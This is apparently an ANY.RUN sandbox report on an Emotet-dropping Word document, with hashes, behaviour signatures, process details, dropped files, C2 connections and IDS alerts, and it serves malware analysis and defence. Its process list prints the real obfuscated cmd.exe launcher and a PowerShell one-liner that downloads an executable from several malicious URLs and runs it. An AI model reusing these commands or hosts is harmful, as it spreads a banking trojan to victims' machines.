analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Invoice_No_85709.doc

Full analysis: https://app.any.run/tasks/22471fd3-a0cd-4901-8ffe-5aa0cf226e4d
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 15, 2018, 07:20:43
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Madison, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 12:45:00 2018, Last Saved Time/Date: Wed Nov 14 12:45:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

38CBBEB27E5FD57F183F519BAF5A0674

SHA1:

D7406FADC1F8189A4F37ADB6BD7240598314E302

SHA256:

6B80EEB2B9D7E86B14E12EE8858DAAF12F92C0AC0340CD6B95E5691FF373591C

SSDEEP:

1536:YZuocn1kp59gxBK85fBt+a9eV6r2EBDxoRwBnRDhYxjhUx5xfxThoxtBqBYRM6Ug:441k/W48bFDxoRwBnRDhYxjhUx5xfxT0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3164)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3164)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3740)
    • Application was dropped or rewritten from another process

      • lpiograd.exe (PID: 2452)
      • LKX.exe (PID: 2684)
      • LKX.exe (PID: 3580)
      • lpiograd.exe (PID: 3072)
    • Emotet process was detected

      • lpiograd.exe (PID: 2452)
    • EMOTET was detected

      • lpiograd.exe (PID: 3072)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 3072)
    • Connects to CnC server

      • lpiograd.exe (PID: 3072)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3740)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 3740)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3984)
    • Starts itself from another location

      • LKX.exe (PID: 2684)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3740)
      • LKX.exe (PID: 2684)
    • Connects to unusual port

      • lpiograd.exe (PID: 3072)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3164)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3164)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Madison
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:14 12:45:00
ModifyDate: 2018:11:14 12:45:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe lkx.exe no specs lkx.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
3164"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice_No_85709.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3984cmd /V/C"^se^t ^oI^Q^1=AO(B=2@^a8^U^T^EICG^iS^[^Xk^y\6rc nbF^f^xo^$^e+^Y^WVp^m;^M3/^{^uqt^jLRP^-'^]^Kh^:^d^D^H^,N)^s^.w}0lv1&&^f^or %N ^in (3^8^;^3^1;^6^6;^3^3;23;6^4^;^56^;3^3^;69^;6^9;25^;3^2;1^5;5^8^;4^9^;4;^53^;^5^0^;^2^7^;^45;53^;^40^;^32^;^1^5^;^51;37;^4;5^3^;5^6^;47^;^4^7;^3^8^;^57^;43^;43^;^24;^52;^4^7^;6^5^;24^;31;^39;^6^5;7^;4^5;4^3;51;64^;38^;0^;41^;27^;45^;^1^6;58;5;^6^;^5^6^;^47;^47;^3^8;^5^7;43^;43;64;^56^;^7^;48;^1^5;64;^5^6^;^7;^6^9^;3^1;39;^65;^2^4^;^31^;39^;^43^;28;^1;60;22;^42^;22^;^46;^3^7^;6;5^6;4^7;4^7;^3^8^;5^7;4^3^;4^3^;^38;^47;^3^3^;^7;^2^4;^7;^58;33;^3^9;^1^5;24;^7^0^;^3^1;^45^;2^4;56;3^3^;2^3;65^;^15^;26^;^43^;8^;^6^9;^37^;^23^;^45;3^6;7;^6;56;^47^;47;^3^8;57^;4^3^;43;^8;22^;^2^2;^7;3^8;^3^8;^6^9^;15^;^7;^26;2^4;33^;^65;^2^4;3^1^;^3^9^;^43;^3^5;^22;^10;0;3^8^;24;^18^;8;0;^6^;^5^6^;^47^;4^7^;38;5^7^;^4^3^;^4^3^;3^8^;^69^;7;26;^3^3^;47;3^3;^2^9;7;^4^5^;2^6;33;^65^;^24^;^31;39^;4^3;^20;45;7;^1^5^;^4^8;^49^;9^;^1^4^;^6^9^;^6^2;^5^3^;^6^5;^1^6^;^3^8;69^;1^5^;^47;2;^5^3;6;5^3;^6^3^;4^0;32;^0;35;^13;4^;^2;^17^;1^6;20^;^6^4;^47^;^33^;^39;6^5;^12^;^1;6^5;^5^1^;^7;4^7;56^;^5^4^;^57^;5^7^;1^4;33^;^47;^10;3^3^;3^9;^38^;5^1;7;47;56;^2^;^6^3^;34;53^;^21^;4^9^;^55^;18;^6^5^;^3^3;30^;^33;53^;63;40^;^3^2;36^;^9^;5^6^;2^5^;^4^;^6^2;^3^3^;66;^5^2;^1;^2^7;48^;3^3;^2^4^;^4^7;2^5;^52;2^4;^3^1;^3^9^;^2^5;5^3^;39;^6^4;3^0^;^3^9;^69^;^5;^65^;30;^3^9;^6^9^;^56^;47^;47;^38^;5^3;^40;3^2;48;4^5^;^1^8;^25;^4^;^25^;^62^;33;^6^6^;5^2^;1;^27;^4^8^;^33;^24^;47;2^5;^5^2;2^4^;3^1;^3^9^;2^5^;^5^3^;^7^;^5^8^;31^;^5^8^;27^;6^5^;^64;^4^7^;23^;33^;^7;^39;5^3;4^0^;29;^3^1^;^2^3^;33;7;^24;^5^6^;2^;32;^37^;49;5^9;25^;1^5^;26;25^;32;15^;51^;3^7;6^3;4^4^;47;^2^3;20^;4^4;3^2;36^;^9;56^;^65^;31^;^38;^3^3^;^2^6;2;^5^3;14^;1^1;^1^0^;5^3;^61^;3^2;^37;4^9^;59;61;68^;6^3^;^40;^32;^3^6;^9;^56^;6^5^;6^4;^3^3^;^26^;^5^8;^2^;6^3;4^0^;^3^2^;^4^8;^45;1^8^;65;^3^1^;38;3^3^;26;^2;^6^3;40;32;^48^;^4^5^;1^8;65;47;20^;38;^3^3^;^2^5^;^4;^25^;^7^1;40^;^3^2;^48^;^45;^18;^65^;^6^6^;^23^;^15;^47;^33^;^2^;^3^2;^36^;9^;5^6;^6^5^;2^3^;^3^3;^64;3^8;^31^;^26;6^4^;3^3^;^3;3^1^;^58;^2^0^;63;4^0^;^3^2;^48;45^;1^8;^6^5^;^64^;^7^;70;3^3^;^47;^31;29;1^5;^6^9^;33;2;32^;^0^;^3^5^;13^;6^3^;^40^;^16^;^47^;^7^;23;4^7;5^2^;^5^1^;23;3^1^;^2^4;^33^;6^4;^64;^25^;32;^0;3^5;13^;40;^2^7^;23;^33^;7;1^9^;67^;2^4;7;4^7;^2^4;56^;^44^;6^7;67;^2^5;25^;^25^;^25;^25;^25^;2^5;25^;^2^5;2^5;2^5;^2^5^;25^;^25;2^5;2^5^;2^5^;82)^do ^s^e^t u^1^e^J=!u^1^e^J!!^oI^Q^1:~%N,1!&&^i^f %N ^g^tr ^81 cal^l %u^1^e^J:*u1e^J^!^=%" C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3740powershell $idL='Rbu';$iPV='http://c-t.com.au/PspAMbuSd2@http://shajishalom.com/FOH636qV@http://pteacademicvoucher.in/8lVruWa@http://866appliance.com/Y6TApcX8A@http://planetefaune.com/yuaijLUGlN'.Split('@');$AYC=([System.IO.Path]::GetTempPath()+'\LKX.exe');$WUh =New-Object -com 'msxml2.xmlhttp';$juX = New-Object -com 'adodb.stream';foreach($VLD in $iPV){try{$WUh.open('GET',$VLD,0);$WUh.send();$juX.open();$juX.type = 1;$juX.write($WUh.responseBody);$juX.savetofile($AYC);Start-Process $AYC;break}catch{}} C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3580"C:\Users\admin\AppData\Local\Temp\LKX.exe" C:\Users\admin\AppData\Local\Temp\LKX.exepowershell.exe
User:
admin
Company:
PeebSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
RT21635 DBIN
Exit code:
0
Version:
1, 4, 2, 50
2684"C:\Users\admin\AppData\Local\Temp\LKX.exe"C:\Users\admin\AppData\Local\Temp\LKX.exe
LKX.exe
User:
admin
Company:
PeebSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
RT21635 DBIN
Exit code:
0
Version:
1, 4, 2, 50
2452"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
LKX.exe
User:
admin
Company:
PeebSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
RT21635 DBIN
Exit code:
0
Version:
1, 4, 2, 50
3072"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
PeebSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
RT21635 DBIN
Version:
1, 4, 2, 50
Total events
1 686
Read events
1 269
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
3164WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR99D3.tmp.cvr
MD5:
SHA256:
3740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2UO4ZLWBX5V97B6SOK1T.temp
MD5:
SHA256:
3164WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:DE73CD16372B15BAEB295705CB5C0665
SHA256:F632D480D71035637003454848418369904B60666AF3749E2E13E876AD4467D0
3740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a916.TMPbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
3740powershell.exeC:\Users\admin\AppData\Local\Temp\LKX.exeexecutable
MD5:77179B700BD3425B0569F74F39AA626B
SHA256:38F08D162E3D5394237D261D7E5C40D2A523CCEA2ED54CB452FD69B0BFF41F33
3740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C5E84CFB7FDA503A7F95914AD626D14
SHA256:847C9A54D0A166FB3A44DD4F6C901834D114B86EF68D6E5A7AAA494B6569B01D
2684LKX.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:77179B700BD3425B0569F74F39AA626B
SHA256:38F08D162E3D5394237D261D7E5C40D2A523CCEA2ED54CB452FD69B0BFF41F33
3164WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$voice_No_85709.docpgc
MD5:C9AD98405DDE04349F291ED62200E1A9
SHA256:64EFB127A4B7AACDDEA7AA20DD0721406E935945BAFA3DEDB8B3ED6FE2FD9CF4
3740powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3072
lpiograd.exe
GET
200
50.78.167.65:7080
http://50.78.167.65:7080/
US
binary
163 Kb
malicious
3072
lpiograd.exe
GET
200
71.58.165.119:443
http://71.58.165.119:443/
US
binary
148 b
malicious
3072
lpiograd.exe
GET
200
71.58.165.119:443
http://71.58.165.119:443/whoami.php
US
text
13 b
malicious
3740
powershell.exe
GET
200
50.62.194.30:80
http://c-t.com.au/PspAMbuSd2/
US
executable
148 Kb
suspicious
3740
powershell.exe
GET
301
50.62.194.30:80
http://c-t.com.au/PspAMbuSd2
US
html
196 b
suspicious
3072
lpiograd.exe
GET
200
50.78.167.65:7080
http://50.78.167.65:7080/
US
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3072
lpiograd.exe
50.78.167.65:7080
Comcast Cable Communications, LLC
US
malicious
3072
lpiograd.exe
71.58.165.119:443
Comcast Cable Communications, LLC
US
malicious
3740
powershell.exe
50.62.194.30:80
c-t.com.au
GoDaddy.com, LLC
US
suspicious

DNS requests

Domain
IP
Reputation
c-t.com.au
  • 50.62.194.30
unknown

Threats

PID
Process
Class
Message
3740
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3740
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
3740
powershell.exe
A Network Trojan was detected
ET TROJAN VBScript Redirect Style Exe File Download
3740
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3072
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3072
lpiograd.exe
A Network Trojan was detected
SC SPYWARE Trojan-Banker.Win32.Emotet
3072
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
3 ETPRO signatures available at the full report
No debug info